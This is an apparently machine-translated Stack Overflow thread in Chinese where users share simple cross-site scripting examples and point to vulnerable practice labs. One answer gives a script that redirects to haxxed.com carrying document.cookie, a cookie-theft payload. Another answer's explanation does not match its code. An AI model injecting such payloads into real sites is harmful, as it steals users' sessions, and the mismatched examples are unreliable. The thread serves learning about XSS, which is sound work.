跨站点脚本攻击的一个简单示例

Sku*_*uli 34 xss

有人可以向我显示我的浏览器生效的跨站点脚本攻击吗?互联网上有一个例子吗?我没有在互联网上找到这个.

这个例子越简单越好.

Erl*_*end 33

http://www.insecurelabs.orghttp://www.insecurelabs.org/task/

在搜索字段和其他几个地方故意容易受到XSS的攻击.

  • 在搜索中键入<script> alert(2)</ script>,它会提醒我 (2认同)

min*_*ret 7

您通常必须为实时XSS示例安装自己的服务器端软件.没有多少合法网站会故意向网络冲浪者开放XSS漏洞.

OWASP的WebGoat是一个现成的服务器端软件,可让您自己演示XSS(以及许多其他内容).以下是安装WebGoat和演示XSS的说明.您将在OWASP文章" 跨站点脚本(XSS) "中找到启用XSS的程序片段的其他示例.


小智 7

<img src="javascript:alert('hello everybody')"></img> 我插入的图像标记是xss的一个示例.上面的src包含提醒你的java脚本.

  • 这没有任何作用!? (2认同)

小智 5

简单表单也可以是:如果消息框出现,您知道,该页面或服务器易受攻击。

  <script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
Run Code Online (Sandbox Code Playgroud)

可以在此处找到有关该技术如何工作的一个很好的示例 https://www.hacksplaining.com/exercises/xss-stored